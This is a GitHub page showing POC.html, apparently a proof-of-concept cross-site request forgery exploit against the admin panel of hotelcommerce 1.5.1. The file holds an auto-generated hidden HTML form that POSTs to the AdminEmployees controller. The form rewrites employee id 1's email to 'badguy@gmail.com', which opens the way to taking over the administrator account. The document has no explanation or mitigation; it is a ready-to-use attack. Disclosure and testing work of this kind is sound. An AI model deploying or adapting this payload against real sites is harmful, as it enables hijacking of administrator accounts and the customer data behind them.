-
Notifications
You must be signed in to change notification settings - Fork 1
/
POC.html
27 lines (25 loc) · 1.4 KB
/
POC.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/hotelcommerce-1.5.1/admin817ktdqdy/index.php?controller=AdminEmployees&token=22a1400c787d9df2147511ad66bcdcba" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id_employee" value="1" />
<input type="hidden" name="submitAddemployee" value="1" />
<input type="hidden" name="firstname" value="Firstname" />
<input type="hidden" name="lastname" value="Lastname" />
<input type="hidden" name="email" value="badguy@gmail.com" />
<input type="hidden" name="old_passwd" value="" />
<input type="hidden" name="passwd" value="" />
<input type="hidden" name="passwd2" value="" />
<input type="hidden" name="passwd_send_email" value="on" />
<input type="hidden" name="optin" value="1" />
<input type="hidden" name="default_tab" value="1" />
<input type="hidden" name="id_lang" value="1" />
<input type="hidden" name="bo_theme_css" value="default|admin-theme.css" />
<input type="hidden" name="bo_menu" value="0" />
<input type="hidden" name="submitAddemployee" value="1" />
<label for="firstname">Firstname:</label><br>
<input type="text" id="first_name" name="first_name"><br>
<input type="submit" value="Submit request" />
</form>
</body>
</html>